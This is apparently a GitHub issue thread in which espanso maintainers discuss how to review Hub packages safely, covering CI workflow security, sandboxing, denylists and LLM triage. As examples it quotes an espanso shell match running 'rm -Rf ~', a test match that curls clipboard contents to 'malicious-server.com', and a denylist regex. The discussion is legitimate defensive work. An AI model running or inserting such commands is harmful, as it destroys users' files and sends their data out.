Closed federico-terzi closed 4 months ago
The `pull_request_target` action doesn't provide a lot of security; for instance, you can't actually check out the PR's code, because that gives it arbitrary access to do whatever it wants. What we could do is:

- Use the PR details to grab the yaml file via the Github API
- Run the validator over the yaml
- Check whether the PR intends to change the Github actions in any way and reject if so
- Use `workflow_run` to label the PR as having valid yaml

That doesn't, however, help with user security.
Something I've been playing around with: we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for `triggers`. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.

We'd be able to automatically reject anything too heinous (attempts to mess with `~/.ssh` directories, `rm whatever`) and provide maintainers with nice reports:
Package: Dylan's Sneaky Exfiltrator

| trigger | files | network |
|---|---|---|
| e | REMOVED /usr/var/important.rc | |
| McDonalds | | POST https://dodgyhacker.io/pwnd |
Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there.
This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.
That same bot could let maintainers throw arbitrary input at packages under investigation, without having to install the package and hope they've not missed anything.
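The "parse the package looking for triggers" step above could be sketched roughly like this (the function and regex are illustrative assumptions, not existing hub tooling; a real implementation should use a proper YAML parser):

```python
import re

# Hypothetical helper: pull every trigger string out of an espanso
# package source. This regex sketch only handles simple
# `- trigger: "..."` lines; nested or multi-trigger forms would need
# a real YAML parser.
TRIGGER_RE = re.compile(r'^\s*-\s*trigger:\s*"([^"]+)"', re.MULTILINE)

def extract_triggers(package_yaml: str) -> list[str]:
    """Return the list of trigger strings found in the package source."""
    return TRIGGER_RE.findall(package_yaml)

example = '''
matches:
  - trigger: "e"
    replace: "expanded"
  - trigger: "McDonalds"
    replace: "{{output}}"
'''

print(extract_triggers(example))  # ['e', 'McDonalds']
```

Each extracted trigger would then be typed into the sandboxed container while the filesystem and network monitors watch for side effects.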
Also, it's probably worth publishing a denylist for scripts and content, just to keep things obvious. And yeah, maybe if the policy disallows (say) messing with hidden folders in the user's home directory, it'll mean some neat packages don't get approved, but it's easier to reject a package for violating clear rules.
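A denylist check could be as simple as scanning the shell commands in a package for forbidden patterns. A minimal sketch, where the pattern list and function name are my own illustrative assumptions rather than any actual hub policy:

```python
import re

# Illustrative denylist: patterns a policy might forbid in shell/script
# expansions. The real list would be decided by the maintainers.
DENYLIST = [
    r"\brm\s+-[rRf]+",               # recursive/forced deletion
    r"~/\.ssh",                      # touching the user's SSH directory
    r"curl\s+.*\{\{clipboard\}\}",   # exfiltrating clipboard contents
]

def denylist_violations(cmd: str) -> list[str]:
    """Return every denylist pattern the command matches."""
    return [p for p in DENYLIST if re.search(p, cmd)]

print(denylist_violations("rm -Rf ~"))     # one violation
print(denylist_violations("echo hello"))   # []
```

Clear, mechanical rules like these make rejections easy to explain, which is exactly the point made above.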
Content-wise, I like the Contributor Covenant as a code of conduct; Espanso could adopt it and then assess packages based on whether the replacements therein would violate the covenant if said in a Github issue.
I hadn't had the chance to read the Contributor Covenant before; I find it very thorough! So, this problem has transformed from "we don't have a way to systematically process all the packages" to "we just need contributors and a tool that catches the most obvious malicious scripts", right? This is a people problem, not a system problem.
Scripts and command-line expansions will need particular care. Are there any dangers from regular expansions? Just damaging phrases one would prefer to avoid pasting into a terminal, I suppose: less risky, but preferably avoided. Can one search the packages' and PRs' code?
Consider integrating an LLM for first-pass security checks. Every major LLM easily warns that this is bad:

```yaml
- trigger: "a"
  replace: "{{output}}"
  vars:
    - name: output
      type: shell
      params:
        cmd: "rm -Rf ~"
```
You might have an automated process that submits packages to some LLM that creates a first-pass report for triage.
Here's a prompt I just tried on a half dozen different LLMs:
You are an expert at evaluating code for security issues. You are being used to evaluate YAML files for the `espanso` text expander utility and must warn if the provided YAML is or is not a security risk for users who import the YAML into their own `espanso` configurations. You will be provided the YAML content without any other context and you must respond with JSON and ONLY JSON. The JSON must have two keys:
* A boolean key `"is_security_risk"`
* A text key `"security_risk_explanation"`
## Example input

```yaml
- trigger: "a"
  replace: "{{output}}"
  vars:
    - name: output
      type: shell
      params:
        cmd: "rm -Rf ~"
```

## Example evaluation output

```json
{
  "is_security_risk": true,
  "security_risk_explanation": "The provided YAML contains a shell command that is a significant security risk. The command 'rm -Rf ~' is used to delete all files and directories in the user's home directory. If this YAML is imported into an espanso configuration, it could potentially lead to data loss when the trigger 'a' is activated."
}
```
Test YAML:

```yaml
- trigger: "email"
  replace: "{{output}}"
  vars:
    - name: output
      type: shell
      params:
        cmd: "curl -X POST -d \"email={{clipboard}}\" http://malicious-server.com/collect"
```
You can test it against a bunch of different models here.
Maybe have new PRs run a GitHub Action that submits to an LLM, parses the output, and sends it on to Discord.
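The "parses the output" step is where most of the glue code would live. A sketch of a tolerant parser for the JSON contract defined in the prompt above (the function name and the fenced-JSON fallback are my assumptions; LLMs often wrap JSON in markdown fences even when told not to):

```python
import json
import re

def parse_llm_report(raw: str) -> dict:
    """Parse the LLM's reply into the expected report dict.

    Accepts either bare JSON or JSON wrapped in a ``` fence, and
    rejects replies missing the two required keys from the prompt.
    """
    text = raw.strip()
    fenced = re.search(r"```(?:json)?\s*(.*?)```", text, re.DOTALL)
    if fenced:
        text = fenced.group(1)
    report = json.loads(text)
    if not {"is_security_risk", "security_risk_explanation"} <= report.keys():
        raise ValueError("LLM reply is missing required keys")
    return report

reply = '{"is_security_risk": true, "security_risk_explanation": "rm -Rf ~ deletes the home directory."}'
print(parse_llm_report(reply)["is_security_risk"])  # True
```

The Action could then post the parsed report to a maintainers-only Discord channel via a webhook.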
I like that! We would need a PR just to know how it works. I'm busy with other stuff, can anyone else take it? 😄
Hey folks!
Sorry for the late reply, adding some thoughts to the thread:
re @DylanLacey
Repo Security
> The `pull_request_target` action doesn't provide a lot of security; for instance, you can't actually check out the PR's code, because that gives it arbitrary access to do whatever it wants. What we could do is:
>
> - Use the PR details to grab the yaml file via the Github API
> - Run the validator over the yaml
> - Check whether the PR intends to change the Github actions in any way and reject if so
> - Use `workflow_run` to label the PR as having valid yaml
Yes, this is what I had in mind (based on https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). The workflow would not automatically approve PRs, though: I think there are too many opportunities for it to be exploited without a human review.
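For reference, the pattern from that article splits the work into two workflows: an untrusted one that runs against the PR without secrets, and a trusted one that reacts to its completion. A minimal sketch, where all names, paths, and steps are illustrative assumptions rather than the hub's real configuration:

```yaml
# .github/workflows/validate.yml (hypothetical)
# Runs in the UNTRUSTED context (plain pull_request trigger, no secrets)
# against the PR's own code, so checking it out is safe here.
name: Validate
on: pull_request
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python .github/scripts/validate  # hypothetical entry point
---
# .github/workflows/label.yml (hypothetical)
# Runs in the TRUSTED context only after Validate completes, so it can
# use secrets (e.g. to label the PR) without exposing them to PR code.
name: Label
on:
  workflow_run:
    workflows: ["Validate"]
    types: [completed]
jobs:
  label:
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    runs-on: ubuntu-latest
    steps:
      - run: echo "label the PR as having valid yaml via the GitHub API"
```

The key property is that nothing triggered directly by the fork ever sees a write-capable token.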
User Security
Automated Reviews
> Something I've been playing around with: we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for `triggers`. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.
>
> We'd be able to automatically reject anything too heinous (attempts to mess with `~/.ssh` directories, `rm whatever`) and provide maintainers with nice reports:
>
> Package: Dylan's Sneaky Exfiltrator
>
> | trigger | files | network |
> |---|---|---|
> | e | REMOVED /usr/var/important.rc | |
> | McDonalds | | POST https://dodgyhacker.io/pwnd |
>
> Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there. This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.
This sounds interesting but probably overly complex/brittle. Having automatic validation + an increased team of reviewers would very likely solve the problem :)
re @dmwyatt
Using LLMs as a (first-pass) security check is an interesting approach, but I'd personally avoid it for two reasons:
Thoughts?
With regards to LLM evaluation:
I would not rely upon LLMs as your sole barrier before publishing a new package. I certainly wouldn't use an LLM instead of other heuristics; I would use them in addition. Given the amount of resources available for developing a robust heuristics-based solution, I would put about the same amount of confidence in LLMs as I would in the heuristics solution.
With regards to cost (speaking in USD here), at least OpenAI lets you set a price limit via your account dashboard. The above prompt is 300 tokens, and a typical response is around 90 tokens. `gpt-3.5-turbo` is $0.50 per million tokens for input and $1.50 per million tokens for output.

If I did my math right, a single prompt with response will cost $0.000285. In other words, $1 will get you 3,508 package evaluations given the prompt above. That's a small package... might want to average the size of all the existing packages to get a better estimate? You could also make sure the workflow just doesn't call the API for larger packages if you want to control costs even more.
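The arithmetic above checks out; a quick sketch, with the prices hard-coded from the figures quoted here (they may well be out of date by the time you read this):

```python
# Cost per evaluation for gpt-3.5-turbo, using the per-token prices
# quoted above (USD per 1M tokens; check current pricing before relying
# on these numbers).
INPUT_PRICE = 0.50 / 1_000_000   # $ per input token
OUTPUT_PRICE = 1.50 / 1_000_000  # $ per output token

prompt_tokens, response_tokens = 300, 90
cost = prompt_tokens * INPUT_PRICE + response_tokens * OUTPUT_PRICE

print(f"${cost:.6f} per evaluation")              # $0.000285 per evaluation
print(f"{int(1 / cost)} evaluations per dollar")  # 3508 evaluations per dollar
```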
Though, I certainly wouldn't hold it against anyone if they didn't want to spend any money at all on something like this that you're not getting any money out of!
(Actually also could look into seeing if we can't get a local LLM running on a GH Action runner)
Yeah, I agree with dmwyatt here. We can use it as another check, not necessarily as the only automatic check. In any scenario, we're accepting that we need more contributors, so why not have some CI to make the work easier? I know it's not perfect to depend on LLMs, but it's a plus on top of hard-coded rules.

A friend of mine recently told me: "In open source, you should not debate whether you ought to do something; you should plainly do it. The community will either praise or judge you for the results" 😆 and he is very much on point. I see we are going around in circles. Can we agree on a plan to move forward? It doesn't need to be perfect... it will never be!
Hello dear reader! We recently met on Discord and talked about the subject. It's not completely solved, but at least we could agree on a few guidelines.
To be clear to the community about the implications of using scripts in the Hub, it needs a `Contributing.md` file specifying who reviews the packages and how, so they meet our expectations before a PR is made. This document should include, among other things, a denylist of dangerous commands (e.g. `rm -f`) to prevent users of those packages from mistakenly causing trouble on their PCs.
Hi all!
I'm writing this issue to align all the team and contributors on the current state of the Espanso Hub. Hopefully, this will give everyone enough context to participate in the discussion.
The core principle that motivates many of the choices detailed below is: Security should be a top priority.
Current state
The Espanso Hub is currently stuck. The last package was merged 9 months ago, and we have >20 packages waiting to be reviewed and merged. This is my fault and I'm sorry about it: I became a bottleneck because I'm (currently) the only one with permission to approve and merge packages, and I've been unable to dedicate time to it in the past few months.
Motivation
The community raised some really valid points in https://github.com/espanso/espanso/issues/1742, which I'll try to address here
Nothing would stop a package maintainer from publishing a good-looking package, and then publishing an update that contains a match like:
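(The snippet was lost in this copy of the thread; based on the example quoted earlier, it was presumably a shell match along these lines:)

```yaml
- trigger: "a"
  replace: "{{output}}"
  vars:
    - name: output
      type: shell
      params:
        cmd: "rm -Rf ~"
```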
so that as soon as the user types `a`, all their files are gone. Script and shell extensions are particularly dangerous.

On one hand, I'm against walled gardens (like Apple's AppStore), but on the other, I'd love to maintain the user expectation that every package they download from the Hub is vetted and safe. There are approaches to mitigate the effort (like improving automatic checks), but removing the review process (even for known package creators) could lead to dangerous packages being released. Keeping in mind that users can still share their packages with others outside the Hub, I still believe that this model is better (although scaling the reviewers team is for sure necessary, because I'm definitely a bottleneck here).
Excluding shell and script extensions is an option, but would limit the usefulness of many packages currently available in the Hub. Examples:
Proper human reviews are the only solution I can think of to allow those useful packages without posing a security risk for users
We already do: https://github.com/espanso/hub/tree/main/.github/scripts/validate There's a list of rules currently being checked, and when run, they verify that the package satisfies a set of must-have conditions. Unfortunately, there's a significant problem with the current approach, and again, it's motivated by security.
A bit of context:
Every time a package is merged on the `main` branch, a Github Action pushes it on the hub-frontend: https://github.com/espanso/hub-frontend so that it can be displayed in the Hub. This action is a sensitive operation, because it requires a token that grants write access to the Espanso Hub.

If you want to run GitHub actions against PRs opened by external contributors, things get tricky. If permissions are not configured correctly, a malicious user could modify the GitHub actions configuration as part of the PR and extract secrets (for more information, see: https://github.blog/2020-08-03-github-actions-improvements-for-fork-and-pull-request-workflows/#improvements-for-public-repository-forks). At the time, I went with the easiest solution that also guaranteed good security: on each new PR, I would manually review that the PR did not change the GitHub actions configuration, and then approve the workflow manually. Clearly, this does not scale very well.
A solution to allow automated workflows while also guaranteeing good security exists, but it takes time to configure correctly, and unfortunately I didn't have capacity in the past few months. See: https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
That's a good question. Due to the nature of Espanso, most users are fairly technical. That said, downloading a package from PyPi and from Espanso might trigger different expectations: when you download a python package, you are downloading an executable, which is dangerous by nature. For many users, Espanso packages might seem safer (most of them are just string replacements after all), and with the Hub, I wouldn't want to break this expectation. If a package is on the Hub, it should be safe to run (dangerous packages can be hosted in external repositories, if necessary)
Thoughts?
cc @AucaCoyan @smeech